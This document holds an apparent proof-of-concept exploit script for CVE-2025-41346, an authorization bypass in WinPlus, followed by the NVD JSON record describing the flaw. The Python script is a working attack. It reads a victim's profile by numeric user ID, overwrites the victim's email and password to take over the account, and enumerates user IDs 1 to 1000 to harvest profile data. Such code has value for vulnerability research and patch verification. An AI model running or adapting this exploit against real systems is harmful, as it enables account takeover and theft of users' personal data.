CVE-2025-41346

# CVE-2025-41346 PoC - WinPlus Authorization Bypass # This PoC demonstrates how an attacker can impersonate another user by knowing their numerical ID import requests import sys TARGET_URL = "http://target-server/winplus" ATTACKER_SESSION = "attacker_session_cookie_here" def exploit_authorization_bypass(target_user_id): """ Exploit the faulty authorization control in WinPlus by using the victim's user ID to access their account """ headers = { "Cookie": f"session={ATTACKER_SESSION}", "Content-Type": "application/json" } # Step 1: Try to access victim profile using victim's user ID profile_endpoint = f"{TARGET_URL}/api/user/profile" params = {"user_id": target_user_id} # Attacker knows victim's ID try: response = requests.get(profile_endpoint, headers=headers, params=params) if response.status_code == 200: print(f"[!] Successfully accessed victim profile (ID: {target_user_id})") print(f"[+] Response: {response.json()}") # Step 2: Modify victim account settings modify_endpoint = f"{TARGET_URL}/api/user/settings" modify_data = { "user_id": target_user_id, "email": "[email protected]", "password": "new_compromised_password" } modify_response = requests.post(modify_endpoint, headers=headers, json=modify_data) if modify_response.status_code == 200: print(f"[!] Account takeover successful!") print(f"[+] Victim credentials modified") return True else: print(f"[-] Exploit failed - Status: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False def enumerate_user_ids(start_id=1, end_id=1000): """ Enumerate user IDs to find valid targets """ headers = { "Cookie": f"session={ATTACKER_SESSION}" } found_users = [] for user_id in range(start_id, end_id + 1): endpoint = f"{TARGET_URL}/api/user/profile" response = requests.get(endpoint, headers=headers, params={"user_id": user_id}) if response.status_code == 200: user_data = response.json() found_users.append({"id": user_id, "data": user_data}) print(f"[+] Found user ID: {user_id}") return found_users if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve_2025_41346_poc.py <target_user_id>") print("Example: python cve_2025_41346_poc.py 12345") sys.exit(1) target_id = int(sys.argv[1]) print(f"[*] Starting exploitation of CVE-2025-41346") print(f"[*] Target user ID: {target_id}") exploit_authorization_bypass(target_id)

{"cve": {"id": "CVE-2025-41346", "sourceIdentifier": "[email protected]", "published": "2025-11-18T10:15:49.847", "lastModified": "2025-11-19T19:14:52.850", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Faulty authorization control in software WinPlus v24.11.27 by Informática del Este that allows another user to be impersonated simply by knowing their 'numerical ID', meaning that an attacker could compromise another user's account, thereby affecting the confidentiality, integrity, and availability of the data stored in the application."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:iest:winplus:24.11.27:*:*:*:-:*:*:*", "matchCriteriaId": "1A66AD43-00CF-49F5-BF3A-C88CE8F59E4B"}]}]}], "references": [{"url": "https://www.incibe.es/en/incibe-cert/notices/aviso/stored-cross-site-scripting-xss-winplus-informatica-del-este", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}